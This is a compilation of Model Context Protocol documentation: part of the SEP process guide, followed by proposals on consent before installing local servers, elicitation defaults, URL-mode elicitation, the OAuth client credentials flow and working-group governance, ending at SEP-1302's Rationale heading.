**Important distinction**: `dormant` is not the same as `rejected`. A dormant SEP simply didn't find a sponsor - the idea may still be valid. If circumstances change (new community interest, new use cases), a dormant SEP can be revived by finding a sponsor and reopening the PR.
## SEP Format
Each SEP should have the following parts:
### 1. Preamble
A short descriptive title, author names/contact info, current status, SEP type, and PR number.
### 2. Abstract
A short (\~200 word) description of the technical issue being addressed.
### 3. Motivation
Why the existing protocol specification is inadequate. This is critical - SEPs without sufficient motivation may be rejected outright.
### 4. Specification
The technical specification describing syntax and semantics of the new feature. Must be detailed enough for competing, interoperable implementations.
### 5. Rationale
Why particular design decisions were made, alternate designs considered, and related work. Should provide evidence of community consensus and address objections raised during discussion.
### 6. Backward Compatibility
All SEPs introducing backward incompatibilities must describe these incompatibilities, their severity, and how to deal with them.
### 7. Reference Implementation
Must be completed before the SEP reaches "Final" status, but need not be complete before acceptance.
### 8. Security Implications
Any security concerns related to the SEP should be explicitly documented.
See the [SEP template](https://github.com/modelcontextprotocol/modelcontextprotocol/blob/main/seps/README.md#sep-file-structure) for the complete file structure.
## Prototype Requirements
Before a SEP can be accepted, you need "a prototype implementation demonstrating the proposal." Here's what qualifies:
**Acceptable prototypes:**
* A working implementation in one of the official SDKs (as a branch/fork)
* A standalone proof-of-concept demonstrating the key mechanics
* Integration tests showing the proposed behavior
* A reference server or client implementing the feature
**The prototype should:**
* Demonstrate the core functionality works as described
* Show the API design is practical and ergonomic
* Reveal any edge cases or implementation challenges
* Be runnable by reviewers (include setup instructions)
**Not sufficient:**
* Pseudocode alone
* A design document without code
* "Trust me, it works" - reviewers need to see it
The prototype doesn't need to be production-ready. It exists to prove feasibility and surface issues early.
## The Sponsor Role
A Sponsor is a Core Maintainer or Maintainer who champions the SEP through the review process. The sponsor's responsibilities include:
* Reviewing the proposal and providing constructive feedback
* Requesting changes based on community input
* **Updating the SEP status** as the proposal progresses
* Initiating formal review when the SEP is ready
* Presenting and discussing the proposal at Core Maintainer meetings
* Ensuring the proposal meets quality standards
Authors should request status changes through their sponsor rather than modifying the status field themselves.
## Status Management
**The Sponsor is responsible for updating the SEP status.** This ensures status transitions are made by someone with the authority and context to do so appropriately.
The sponsor:
1. Updates the `Status` field directly in the SEP markdown file (or, if they do not have access to the source repo, work with the author to set the right status)
2. Applies matching labels to the pull request (e.g., `draft`, `in-review`, `accepted`)
Both the markdown status field and PR labels should be kept in sync. The markdown file is the canonical record (versioned with the proposal), while PR labels make it easy to filter and search.
## SEP Review & Resolution
SEPs are reviewed by the MCP Core Maintainers team every two weeks.
For a SEP to be accepted it must meet these criteria:
* A prototype implementation demonstrating the proposal
* Clear benefit to the MCP ecosystem
* Community support and consensus
Once a SEP has been accepted, the reference implementation must be completed. When complete and incorporated into the main repository, the status changes to "Final".
## After Rejection
Rejection is not permanent. You can:
1. **Address the feedback** - If specific concerns were raised, address them and resubmit
2. **Discuss the rejection** - Ask in Discord to understand the reasoning
3. **Submit a competing SEP** - Sometimes a different approach works better
4. **Wait for the right time** - Community needs evolve; what's rejected today may be welcomed later
## Reporting SEP Bugs or Updates
For SEPs not yet reaching `final` state, comment directly on the SEP's pull request. Once a SEP is finalized and merged, submit updates by creating a new pull request that modifies the SEP file.
## Transferring SEP Ownership
It occasionally becomes necessary to transfer ownership of SEPs to a new author. In general, we'd like to retain the original author as a co-author, but that's up to the original author.
Good reasons to transfer ownership:
* Original author no longer has time or interest
* Original author is unreachable
Bad reasons:
* You disagree with the direction (submit a competing SEP instead)
## Copyright
This document is placed in the public domain or under the CC0-1.0-Universal license, whichever is more permissive.
# SEP-1024: MCP Client Security Requirements for Local Server Installation
Source: https://modelcontextprotocol.io/community/seps/1024-mcp-client-security-requirements-for-local-server-
MCP Client Security Requirements for Local Server Installation
Final
Standards Track
| Field | Value |
| ------------- | ------------------------------------------------------------------------------- |
| **SEP** | 1024 |
| **Title** | MCP Client Security Requirements for Local Server Installation |
| **Status** | Final |
| **Type** | Standards Track |
| **Created** | 2025-07-22 |
| **Author(s)** | Den Delimarsky |
| **Sponsor** | None |
| **PR** | [#1024](https://github.com/modelcontextprotocol/modelcontextprotocol/pull/1024) |
***
## Abstract
This SEP addresses critical security vulnerabilities in MCP client implementations that support one-click installation of local MCP servers. The current MCP specification lacks explicit security requirements for client-side installation flows, allowing malicious actors to execute arbitrary commands on user systems through crafted MCP server configurations distributed via links or social engineering.
This proposal establishes a best practice for MCP clients, requiring explicit user consent before executing any local server installation commands and complete command transparency.
## Motivation
The existing MCP specification does not address client-side security concerns related to streamlined ("one-click") local server configuration. Current MCP clients that implement these configuration experiences create significant attack vectors:
1. **Silent Command Execution**: MCP clients can automatically execute embedded commands without user review or consent when installing local servers via one-click flows.
2. **Lack of Visibility**: Users have no insight into what commands are being executed on their systems, creating opportunities for data exfiltration, system compromise, and privilege escalation.
3. **Social Engineering Vulnerabilities**: Users become comfortable executing commands labeled as "MCP servers" without proper scrutiny, making them susceptible to malicious configurations.
4. **Arbitrary Code Execution**: Attackers can embed harmful commands in MCP server configurations and distribute them through legitimate channels (repositories, documentation, social media).
Visual Studio Code [addressed this](https://den.dev/blog/vs-code-mcp-install-consent/) by implementing consent dialogs. Similarly, Cursor also supports a consent dialog for one-click local MCP server installation.
Without explicit security requirements in the specification, MCP client implementers may unknowingly create vulnerable installation flows, putting end users at risk of system compromise.
## Specification
### Client Security Requirements
MCP clients that support one-click local MCP server configuration **MUST** implement the following security controls:
#### Pre-Configuration Consent
Before executing any command to install or configure a local MCP server, the MCP client **MUST**:
1. Display a clear consent dialog that shows:
* The exact command that will be executed, without truncation
* All arguments and parameters
* A clear warning that this operation may be potentially dangerous
2. Require explicit user approval through an affirmative action (button click, checkbox, etc.)
3. Provide an option for users to cancel the installation
4. Not proceed with installation if consent is denied or not provided
## Rationale
### Design Decisions
**Mandatory Consent Dialogs**: The requirement for explicit consent dialogs balances security with usability. While this adds friction to the MCP server configuration process, it prevents potential breaches from silent command execution.
## Backward Compatibility
This SEP introduces new **requirements** for MCP client implementations but does not change the core MCP protocol or wire format.
**Impact Assessment:**
* **Low Impact**: Existing MCP servers and the core protocol remain unchanged
* **Client Implementation Required**: MCP clients must update their local server installation flows to comply with new security requirements
* **User Experience Changes**: Users will see consent dialogs where none existed before
**Migration Path:**
1. MCP clients can implement these changes in new versions without breaking existing functionality
2. Existing installed MCP servers continue to work normally
3. Only new installation flows require the consent mechanisms
No protocol-level backward compatibility issues exist, as this SEP addresses client behavior rather than the MCP wire protocol.
## Reference Implementation
N/A
## Security Implications
### Security Benefits
This SEP directly addresses:
* **Arbitrary Code Execution**: Prevents silent execution of malicious commands
* **Social Engineering**: Forces users to consciously review commands before execution
* **Supply Chain Attacks**: Creates visibility into MCP server installation commands
* **Privilege Escalation**: Users can identify and reject commands requesting elevated privileges
### Residual Risks
Even with these controls, risks remain:
* **User Override**: Users may approve malicious commands despite warnings
* **Sophisticated Obfuscation**: Advanced attackers may craft commands that appear legitimate
* **Implementation Gaps**: Clients may implement controls incorrectly
### Risk Mitigation
These residual risks are addressed through:
* Clear warning language in consent dialogs
* Recommendation for additional security layers (sandboxing, signatures)
* Ongoing security research and community awareness
# SEP-1034: Support default values for all primitive types in elicitation schemas
Source: https://modelcontextprotocol.io/community/seps/1034--support-default-values-for-all-primitive-types-in
Support default values for all primitive types in elicitation schemas
Final
Standards Track
| Field | Value |
| ------------- | ------------------------------------------------------------------------------- |
| **SEP** | 1034 |
| **Title** | Support default values for all primitive types in elicitation schemas |
| **Status** | Final |
| **Type** | Standards Track |
| **Created** | 2025-07-22 |
| **Author(s)** | Tapan Chugh (chugh.tapan[@gmail](https://github.com/gmail).com) |
| **Sponsor** | None |
| **PR** | [#1034](https://github.com/modelcontextprotocol/modelcontextprotocol/pull/1034) |
***
## Abstract
This SEP recommends adding support for default values to all primitive types in the MCP elicitation schema (StringSchema, NumberSchema, and EnumSchema), extending the existing support that only covers BooleanSchema.
## Motivation
Elicitations in MCP offer a way to mitigate complex API designs: tools can request information on-demand rather than resorting to convoluted parameter handling. The challenge however is that users must manually enter obvious information that could be pre-populated for more natural interactions. Currently, only `BooleanSchema` supports default values in elicitation requests. This limitation prevents servers from providing sensible defaults for text inputs, numbers, and enum selections leading to more user overhead.
### Real-World Example
Consider implementing an email reply function. Without elicitation, the tool becomes unwieldy:
```python theme={null}
def reply_to_email_thread(
thread_id: str,
content: str,
recipient_list: List[str] = [],
cc_list: List[str] = []
) -> None:
# Ambiguity: Does empty list mean "no recipients" or "use defaults"?
# Complex logic needed to handle different combinations
```
With elicitation, the tool signature itself can be much simpler
```python theme={null}
def reply_to_email_thread(
thread_id: str,
content: Optional[str] = ""
) -> None:
# Code can lookup the participants from the original thread
# and prepare an elicitation request with the defaults setup
```
```typescript theme={null}
const response = await client.request("elicitation/create", {
message: "Configure email reply",
requestedSchema: {
type: "object",
properties: {
recipients: {
type: "string",
title: "Recipients",
default: "alice@company.com, bob@company.com" // Pre-filled
},
cc: {
type: "string",
title: "CC",
default: "john@company.com" // Pre-filled
},
content: {
type: "string",
title: "Message"
default: "" // If provided in the tool above
}
}
}
});
```
### Implementation
A working implementation demonstrating clients require minimal changes to display defaults (\~10 lines of code):
* Implementation PR: [https://github.com/chughtapan/fast-agent/pull/2](https://github.com/chughtapan/fast-agent/pull/2)
* A demo with the above email reply workflow: [https://asciinema.org/a/X7aQZjT2B5jVwn9dJ9sqQVkOM](https://asciinema.org/a/X7aQZjT2B5jVwn9dJ9sqQVkOM)
## Specification
### Schema Changes
Extend the elicitation primitive schemas to include optional default values:
```typescript theme={null}
export interface StringSchema {
type: "string";
title?: string;
description?: string;
minLength?: number;
maxLength?: number;
format?: "email" | "uri" | "date" | "date-time";
default?: string; // NEW
}
export interface NumberSchema {
type: "number" | "integer";
title?: string;
description?: string;
minimum?: number;
maximum?: number;
default?: number; // NEW
}
export interface EnumSchema {
type: "string";
title?: string;
description?: string;
enum: string[];
enumNames?: string[];
default?: string; // NEW - must be one of enum values
}
// BooleanSchema already has default?: boolean
```
### Behavior
1. The `default` field is optional, maintaining full backward compatibility
2. Default values must match the schema type
3. For EnumSchema, the default must be one of the valid enum values
4. Clients that support defaults SHOULD pre-populate form fields. Clients that don't support defaults MAY ignore the field entirely.
## Rationale
1. The high-level rationale is to follow the precedent set by BooleanSchema rather than creating new mechanisms.
2. Making defaults optional ensures backward compatibility.
3. This maintains the high-level intuition of keeping the client implementation simple.
### Alternatives Considered
1. **Server-side Templates**: Servers could maintain templates separately, but this adds complexity
2. **New Request Type**: A separate request type for forms with defaults would fragment the API
3. **Required Defaults**: Making defaults required would break existing implementations
## Backwards Compatibility
This change is fully backward compatible with no breaking changes. Clients that don't understand defaults will ignore them, and existing elicitation requests continue to work unchanged. Clients can adopt default support at their own pace
## Security Implications
No new security concerns:
1. **No Sensitive Data**: The existing guidance against requesting sensitive information still applies
2. **Client Control**: Clients retain full control over what data is sent to servers
3. **User Visibility**: Default values are visible to users who can modify them before submission
# SEP-1036: URL Mode Elicitation for secure out-of-band interactions
Source: https://modelcontextprotocol.io/community/seps/1036-url-mode-elicitation-for-secure-out-of-band-intera
URL Mode Elicitation for secure out-of-band interactions
Final
Standards Track
| Field | Value |
| ------------- | ------------------------------------------------------------------------------------------------------------------------- |
| **SEP** | 1036 |
| **Title** | URL Mode Elicitation for secure out-of-band interactions |
| **Status** | Final |
| **Type** | Standards Track |
| **Created** | 2025-07-22 |
| **Author(s)** | Nate Barbettini ([@nbarbettini](https://github.com/nbarbettini)) and Wils Dawson ([@wdawson](https://github.com/wdawson)) |
| **Sponsor** | None |
| **PR** | [#1036](https://github.com/modelcontextprotocol/modelcontextprotocol/pull/1036) |
***
## Abstract
This SEP introduces a new `url` mode for the existing elicitation client capability, enabling secure out-of-band interactions that bypass the MCP client. URL mode elicitation addresses sensitive use cases that form mode elicitation cannot, such as gathering sensitive credentials, performing OAuth flows for external (3rd-party) authorization, and handling payments, *without* exposing sensitive data to the MCP client. By directing users to trusted URLs in their browser, this mode maintains security boundaries while enabling rich integrations with third-party services.
## Motivation
The current MCP specification (2025-06-18) provides an elicitation mechanism for gathering non-sensitive information from users through structured, in-band requests (most commonly imagined as the MCP client rendering a form to collect data from the end-user). However, several critical use cases require interactions that must not pass through the MCP client:
1. Sensitive data collection: API keys, passwords, and other credentials must never transit through intermediary systems.
2. External authorization: MCP servers often need to access third-party APIs on behalf of users. The MCP authorization specification only covers client-to-server authorization, not server-to-third-party authorization. The [Security Best Practices](https://modelcontextprotocol.io/specification/2025-06-18/basic/security_best_practices) document explicitly forbids token passthrough, requiring a secure mechanism for external (3rd-party) OAuth flows. This was a particularly important motivating factor emerging from discussions in #234 and #284.
3. Payment and Subscription Flows: Financial transactions require PCI compliance and secure payment processing that cannot be achieved through in-band data collection.
Without a standardized mechanism for these interactions, MCP servers must resort to non-standard workarounds or insecure practices like requesting API keys through in-band, form-style elicitation. This SEP addresses these gaps by introducing a URL elicitation mode that leverages established web security patterns to handle sensitive interactions securely.
URL elicitation is fundamentally different from [MCP authorization](https://modelcontextprotocol.io/specification/2025-06-18/basic/authorization). URL elicitation is not for authorizing the MCP client's access to the MCP server (that's handled directly by MCP authorization). Instead, it's used when the MCP server needs to obtain sensitive information or third-party authorization on behalf of the user. The MCP client's bearer token remains unchanged, and the client's only responsibility is to provide the user with context about the elicitation URL the server wants them to open.
## Specification
### Overview
Elicitation is updated to support two modes:
* **Form mode** (in-band): Servers can request structured data from users with optional JSON schemas to validate responses (no change here, other than adding a name to the existing capability)
* **URL mode** (out-of-band): Servers can direct users to external URLs for sensitive interactions that must not pass through the MCP client
### Capabilities
Clients that support elicitation **MUST** declare the `elicitation` capability during initialization:
```json theme={null}
{
"capabilities": {
"elicitation": {
"form": {},
"url": {}
}
}
}
```
For backwards compatibility, an empty capabilities object is equivalent to declaring support for `form` mode only:
```jsonc theme={null}
{
"capabilities": {
"elicitation": {},
},
}
```
Clients declaring the `elicitation` capability **MUST** support at least one mode (`form` or `url`).
### Form Elicitation Requests
The only change from the existing specification is the addition of a `mode` field in the `elicitation/create` request:
```json theme={null}
{
"jsonrpc": "2.0",
"id": 1,
"method": "elicitation/create",
"params": {
"mode": "form", // New field
"message": "Please provide your GitHub username",
"requestedSchema": {
"type": "object",
"properties": {
"name": {
"type": "string"
}
},
"required": ["name"]
}
}
}
```
### URL Elicitation Requests
URL elicitation requests **MUST** specify `mode: "url"` and include these parameters:
| Name | Type | Description |
| --------------- | ------ | ------------------------------------------------------------------ |
| `url` | string | The URL that the user should navigate to. |
| `elicitationId` | string | A unique identifier for the elicitation. |
| `message` | string | A human-readable message explaining why the interaction is needed. |
#### Example: OAuth Authorization Flow
```json theme={null}
{
"jsonrpc": "2.0",
"id": 3,
"method": "elicitation/create",
"params": {
"mode": "url",
"elicitationId": "550e8400-e29b-41d4-a716-446655440000",
"url": "https://github.com/login/oauth/authorize?client_id=abc123&state=xyz789&scope=repo",
"message": "Please authorize access to your GitHub repositories to continue."
}
}
```
#### Response Actions
URL elicitation responses use the same three-action model as form elicitation:
```json theme={null}
{
"jsonrpc": "2.0",
"id": 3,
"result": {
"action": "accept" // or "decline" or "cancel"
}
}
```
The response with `action: "accept"` indicates that the user has consented to the interaction. The interaction occurs out of band and the client is not aware of the outcome unless the server sends a completion notification.
#### Completion Notifications
Servers **SHOULD** send a `notifications/elicitation/complete` notification when an
out-of-band interaction started by URL mode elicitation is completed. This allows clients to react programmatically if appropriate.
* The notification **MUST** only be sent to the client that initiated the elicitation request.
* The notification **MUST** include the `elicitationId` established in the original `elicitation/create` request.
* Clients **MUST** ignore notifications referencing unknown or already-completed IDs.
* If a completion notification never arrives, clients **SHOULD** provide a manual way for the user to continue the interaction.
Clients **MAY** use the notification to automatically retry requests that received a URL elicitation required error, update the user interface, or otherwise continue an interaction. However, because delivery of the notification is not guaranteed, clients must not wait indefinitely for a notification from the server.
```json theme={null}
{
"jsonrpc": "2.0",
"method": "notifications/elicitation/complete",
"params": {
"elicitationId": "550e8400-e29b-41d4-a716-446655440000"
}
}
```
#### URL Elicitation Required Error
When a request cannot be processed until an elicitation is completed, the server **MAY** return a `URLElicitationRequiredError` (code `-32042`) to indicate that a URL mode elicitation is required. The server **MUST NOT** return this error except when URL mode elicitation is required by the user interaction.
```json theme={null}
{
"jsonrpc": "2.0",
"id": 2,
"error": {
"code": -32042,
"message": "This request requires more information.",
"data": {
"elicitations": [
{
"mode": "url",
"elicitationId": "550e8400-e29b-41d4-a716-446655440000",
"url": "https://oauth.example.com/authorize?client_id=abc123&response_type=code&...",
"message": "Authorization is required to access your Example Co files."
}
]
}
}
}
```
Any elicitations returned in the error **MUST** be URL mode elicitations and include an `elicitationId`.
Returning a `URLElicitationRequiredError` is equivalent to sending an `elicitation/create` request. The server may return an error (instead of sending a separate `elicitation/create` request) as an affordance to the client to make it clear that a particular elicitation is directly related to a failed client request.
The client must treat `URLElicitationRequiredError` responses as equivalent to `elicitation/create` requests. Clients may automatically retry the failed request after the elicitation is completed successfully, for example after receiving a completion notification.
## Rationale
### Design Decisions
**Why extend elicitation instead of creating a new mechanism?**
Initially, we considered creating a separate mechanism for out-of-band interactions (discussed in #475). However, after discussions with the MCP maintainers, we decided to extend the existing elicitation specification because:
1. Both mechanisms serve the same fundamental purpose: gathering information from users
2. Having two similar-but-separate mechanisms for the same purpose is confusing and error-prone
3. The `mode` parameter cleanly separates the two interaction patterns
**Why can't the client perform the interaction itself?**
It is tempting to suggest that the MCP client should perform the interaction itself, e.g. act as an OAuth client to a third-party authorization server. However, there are several reasons why this is not a good idea:
* If the MCP client obtains user tokens from a third-party authorization server, the MCP server becomes a [token passthrough](https://modelcontextprotocol.io/specification/2025-06-18/basic/security_best_practices#token-passthrough) server, which is explicitly forbidden.
* Similarly, for payment-type flows, the MCP client would need to perform PCI-compliant payment processing, which is not a desired requirement for MCP clients.
**Why doesn't the server block (wait) on the elicitation to complete?**
URL mode elicitation requests are asynchronous or "disconnected" flows by design, because the kinds of interactions they enable are inherently asynchronous. Payment flows, external authorization, etc. can take minutes or more to complete, and in some cases never complete at all (if abandoned by the end-user).
**Why disallow URLs in form mode?**
Being very explicit about when URLs can (and cannot) be sent in an elicitation request improves the client's security posture. By clearly stating in the spec that URLs are *only* allowed in the `url` field of a URL mode elicitation request, client implementers can implement UX patterns that are consistent with the security model. For example, a client could refuse to render a URL as a clickable hyperlink in a form mode elicitation request, reducing the likelihood of a user clicking on a malicious URL sent by a malicious server.
### Alternative Approaches Considered
1. **Token Passthrough**: Simply passing the MCP client's token to external services was rejected due to security concerns documented in the Security Best Practices. Having the MCP client obtain additional tokens and passing those to the MCP server was rejected for the same reason.
2. **OAuth-specific Capability**: Creating a capability specific to external (3rd-party) authorization with OAuth was considered, but rejected in favor of the more general URL mode elicitation approach that supports multiple use cases.
### Community Feedback
This proposal incorporates extensive community feedback from discussions in #475, #234, and #284, as well as the #auth-wg working group on Discord. The community identified the need for:
* Secure credential collection without client exposure
* External authorization patterns separate from MCP authorization
* Payment and subscription flow support
* Clear security boundaries and trust models
## Backward Compatibility
This SEP introduces the following breaking changes:
1. **Capability Declaration**: Clients must now specify which elicitation modes they support:
```json theme={null}
{
"capabilities": {
"elicitation": {
"form": {},
"url": {}
}
}
}
```
Previously, clients only declared `"elicitation": {}` without mode specification.
2. **Mode Parameter**: All `elicitation/create` requests must now include a `mode` parameter (`"form"` or `"url"`).
### Migration Path
To ease migration:
* Servers SHOULD check client capabilities before sending mode-specific requests
* Clients MAY initially support only form mode to maintain compatibility
* Existing form elicitation implementations continue to work with the addition of the mode parameter
# Reference Implementation
Client/server implementation in TypeScript: [feat/url-elicitation](https://github.com/modelcontextprotocol/typescript-sdk/compare/main...ArcadeAI:mcp-typescript-sdk:feat/url-elicitation)
Explainer video: [https://drive.google.com/file/d/1llCFS9wmkK\_RUgi5B-zHfUUgy-CNb0n0/view?usp=sharing](https://drive.google.com/file/d/1llCFS9wmkK_RUgi5B-zHfUUgy-CNb0n0/view?usp=sharing)
## Security Implications
This SEP introduces several security considerations:
### URL Security Requirements
1. **SSRF Prevention**: Clients must validate URLs to prevent Server-Side Request Forgery attacks
2. **Protocol Restrictions**: Only HTTPS URLs are allowed for URL elicitation
3. **Domain Validation**: Clients must clearly display target domains to users
### Trust Boundaries
URL elicitation explicitly creates clear trust boundaries:
* The MCP client never sees sensitive data obtained by the MCP server via URL elicitation
* The MCP server must independently verify user identity
* Third-party services interact directly with users through secure browser contexts
### Identity Verification
Servers must verify that the user completing a URL elicitation is the same user who initiated the request. Verifying the identity of the user must not rely on untrusted input (e.g. user input) from the client.
### Implementation Requirements
1. **Clients must**:
* Use secure browser contexts that prevent inspection of user inputs
* Validate URLs for SSRF protection
* Obtain explicit user consent before opening URLs
* Clearly display target domains
2. **Servers must**:
* Bind elicitation state to authenticated user sessions
* Verify user identity at the beginning and end of a URL elicitation flow
* Implement appropriate rate limiting
3. **Both parties should**:
* Log security events for audit purposes
* Implement timeout mechanisms for elicitation requests
* Provide clear error messages for security failures
### Relationship to Existing Security Measures
This proposal builds upon and complements existing MCP security measures:
* Works within the existing MCP authorization framework (MCP authorization is not affected by this proposal)
* Follows Security Best Practices regarding token handling
* Maintains separation of concerns between client-server and server-third-party authorization
# SEP-1046: Support OAuth client credentials flow in authorization
Source: https://modelcontextprotocol.io/community/seps/1046-support-oauth-client-credentials-flow-in-authoriza
Support OAuth client credentials flow in authorization
Final
Standards Track
| Field | Value |
| ------------- | ------------------------------------------------------------------------------- |
| **SEP** | 1046 |
| **Title** | Support OAuth client credentials flow in authorization |
| **Status** | Final |
| **Type** | Standards Track |
| **Created** | 2025-07-23 |
| **Author(s)** | Darin McAdams ([@D-McAdams](https://github.com/D-McAdams) ) |
| **Sponsor** | None |
| **PR** | [#1046](https://github.com/modelcontextprotocol/modelcontextprotocol/pull/1046) |
***
## Abstract
Recommends adding the OAuth client credentials flow to the authorization spec to enable machine-to-machine scenarios.
### Motivation
The original authorization spec mentioned the client credentials flow, but it was dropped in subsequent revisions. Therefore, the spec is currently silent on how to solve machine-to-machine scenarios where an end-user is unavailable for interactive authorization.
### Specification
The authorization spec would be amended to list the OAuth client credentials flow as being allowed. Adhering to the patterns established by OAuth 2.1, the specification would RECOMMEND the use of asymmetric methods defined in RFC 753 (JWT Assertions), but also allow client secrets.
As guidance to implementors, the spec overview would also be updated to describe the different flows and when each is applicable. In addition, to address a common question, the spec would be updated to indicate that implementors may implement other authorization scenarios beyond what's defined; emphasizing that the specification defines the baseline requirements.
### Rationale
To maximize interoperability (and minimize SDK complexity), this change would intentionally constrain the client credentials flow to two options:
1. JWT Assertions as per RFC 7523 (RECOMMENDED)
2. Client Secrets via HTTP Basic authentication (Allowed for maximum compatibility with existing systems)
Other options, such as mTLS, are not included.
While the spec encourages the use of RFC 7523 (JWT Assertions), it does not yet specify how to populate the JWT contents nor how to discover the client's JWKS URI to validate the JWT. In future iterations of the spec, it will be beneficial to do so. However, this was currently left unspecified pending maturity of other RFCs that can define these profiles. The other RFCs include [WIMSE Headless JWT Authentication](https://www.ietf.org/archive/id/draft-levy-wimse-headless-jwt-authentication-01.html) (for specifying JWT contents) and [Client ID Metadata](https://datatracker.ietf.org/doc/draft-parecki-oauth-client-id-metadata-document/) (for specifying the JWKS URI). This revision intentionally leaves extensibility for these future profiles. As a practical matter, this means implementers needing to ship solutions ASAP will most likely use client secrets which are widely supported today, whereas the JWT Assertion pattern represents the longer-term direction.
### Backward Compatibility
This change is fully backward compatible. It introduces a new authorization flow, but does not alter the existing flows.
### Security Implications
The specification refers to the existing OAuth security guidance.
# SEP-1302: Formalize Working Groups and Interest Groups in MCP Governance
Source: https://modelcontextprotocol.io/community/seps/1302-formalize-working-groups-and-interest-groups-in-mc
Formalize Working Groups and Interest Groups in MCP Governance
Final
Standards Track
| Field | Value |
| ------------- | ------------------------------------------------------------------------------- |
| **SEP** | 1302 |
| **Title** | Formalize Working Groups and Interest Groups in MCP Governance |
| **Status** | Final |
| **Type** | Standards Track |
| **Created** | 2025-08-05 |
| **Author(s)** | tadasant |
| **Sponsor** | None |
| **PR** | [#1302](https://github.com/modelcontextprotocol/modelcontextprotocol/pull/1302) |
***
## Abstract
*A short (\~200 word) description of the technical issue being addressed.*
In [SEP-994](https://github.com/modelcontextprotocol/modelcontextprotocol/pull/1002), we introduced a notion of “Working Groups” and “Interest Groups” that facilitate MCP sub-communities for discussion and collaboration. This SEP aims to formally define those two terms: what they are meant to achieve, how groups can be created, how they are governed, and how they can be retired.
Interest Groups work to define *problems* that MCP should solve by facilitating *discussions*, while Working Groups push forward specific *solutions* by collaboratively producing *deliverables* (in the form of SEPs or community-owned implementations of the specification). Interest Group input is a welcome (but not required) justification for creation of a Working Group. Interest Group or Working Group input is collectively a welcome (but not required) input into a SEP.
## Motivation
*The motivation should clearly explain why the existing protocol specification is inadequate to address the problem that the SEP solves.*
The community has already been self-organizing into several disparate systems for these collaborative groups:
* The Steering group has had a long-standing practice of managing a handful of collaborative groups through Discord channels (e.g. security, auth, agents). See [bottom of MAINTAINERS.md](https://github.com/modelcontextprotocol/modelcontextprotocol/blob/main/MAINTAINERS.md).
* The “CWG Discord” has had a [semi-formal process](https://github.com/modelcontextprotocol-community/working-groups) for pushing equivalent grassroots initiatives, mostly in pursuit of creating artifacts for SEP consideration (e.g. hosting, UI, tool-interfaces, search-tools)
With SEP-994 resulting in the merging of the Discord communities, we have a need to:
* Merge the existing initiatives into one unified approach, so when we reference “working group” or “interest group”, everyone knows what that means and what kind of weight the reference might carry
* Standardize a process around the creation (and eventual retirement) of such groups
* Properly distinguish between “working” and “interest” groups; the CWG experience has shown two very different motivations for starting a group worth treating with different expectations and lifecycle. Put succinctly, “interest” groups are about brainstorming possible *problems*, and “working” groups are about pushing forward specific *solutions*.
These groups exist to:
* **Facilitate high signal spaces for discussion** such that those opting into notifications and meetings feel most content is relevant to them and they can meaningfully contribute their experience and learn from others
* **Create norms, expectations, and single points of involved leadership** around making collaborative progress towards concrete deliverables that help evolve MCP
It will also form the foundation for cross-group initiatives, such as maintaining a calendar of live meetings.
## Specification
*The technical specification should describe the syntax and semantics of any new protocol feature. The specification should be detailed enough to allow competing, interoperable implementations. A PR with the changes to the specification should be provided.*
### Interest Groups (IG) \[Problems]
**Goal**: facilitate discussion and knowledge-sharing among MCP community members with similar interests surrounding some MCP sub-topic or context. The focus is on collecting *problems* that may or may not be worth solving with SEPs or other community artifacts.
**Expectations**:
* At least one substantive thread / conversation per month
* AND/OR a live meeting attended by 3+ unaffiliated individuals
**Examples**:
* Security in MCP (currently: #security)
* Auth in MCP (currently: #auth)
* Using MCP in an internal enterprise setting (currently: #enterprise-wg)
* Tooling and practices surrounding hosting MCP servers (currently: #hosting-wg)
* Tooling and practices surrounding implementing MCP clients (currently: #client-implementors)
**Lifecycle**:
* Creation begins by filling out a template in #wg-ig-group-creation Discord channel
* A community moderator will review and call for a vote in the (private) #community-moderators Discord channel. Majority positive vote by members over a 72h period approves creation of the group. Can be reversed at any time (e.g. after more input comes in). Core and lead maintainers can veto.
* Facilitator(s) and Maintainer(s) responsible for organizing IG into meeting expectations
* Facilitator is an informal role responsible for shepherding or speaking for a group
* Maintainer is an official representative from the MCP steering group (not required for every group to have this)
* IG is retired only when community moderators or core+ maintainers decide it is not meeting expectations
* This means successful IG’s will live on in perpetuity
**Creation Template**:
* Facilitator(s)
* Maintainer(s) (optional)
* Flag potential overlap with other IG’s
* How this IG differentiates itself from the related IG’s
* First topic you want to discuss
There is no requirement to be part of an IG to start a WG, or even to start a SEP. However, forming consensus in IG’s to support justifying the creation of a WG is often a good idea. Similarly, citing IG or WG support of a SEP helps the SEP as well.
### Working Groups (WG) \[Solutions]
**Goal**: facilitate MCP community collaboration on a specific SEP, themed series of SEPs, or officially endorsed Project.
**Expectations**:
* Minimum monthly progress towards at least one SEP or spec-related implementation OR holds maintenance responsibilities for a Project
* Facilitator(s) is/are responsible for fielding status update requests by community moderators or maintainers
**Examples**:
* Registry
* Inspector
* Tool Filtering
* Server Identity
**Lifecycle**:
* Creation begins by filling out a template in #wg-ig-group-creation Discord channel
* A community moderator will review and call for a vote in the (private) #community-moderators Discord channel. Majority positive vote by members over a 72h period approves creation of the group. Can be reversed at any time (e.g. after more input comes in). Core and lead maintainers can veto.
* Facilitator(s) and Maintainer(s) responsible for organizing WG into meeting expectations
* Facilitator is an informal role responsible for shepherding or speaking for a group
* Maintainer is an official representative from the MCP steering group (not required for every group to have this)
* WG is retired when either:
* Community moderators or core+ maintainers decide it is not meeting expectations
* The WG does not have a WIP Issue/PR for at least a month, or has completed all Issues/PRs it intends to pursue.
**Creation Template**:
* Facilitator(s)
* Maintainer(s) (optional)
* Explanation of interest/use cases (ideally from an IG but can come from anywhere)
* First Issue/PR/SEP you intend to procure
### WG/IG Facilitators
A “Facilitator” role in a WG or IG does *not* result in a [maintainership role](https://github.com/modelcontextprotocol/modelcontextprotocol/blob/main/MAINTAINERS.md) across the MCP organization. It is an informal role into which anyone can self-nominate, responsible for helping shepherd discussions and collaboration within the group.
Core Maintainers reserve the right to modify the list of Facilitators and Maintainers for any WG/IG at any time.
PR for the changes to our documentation we'd want to enact this SEP: [https://github.com/modelcontextprotocol/modelcontextprotocol/pull/1350](https://github.com/modelcontextprotocol/modelcontextprotocol/pull/1350)
## Rationale
*The rationale explains why particular design decisions were made. It should describe alternate designs that were considered and related work. The rationale should provide evidence of consensus within the community and discuss important objections or concerns raised during discussion.*
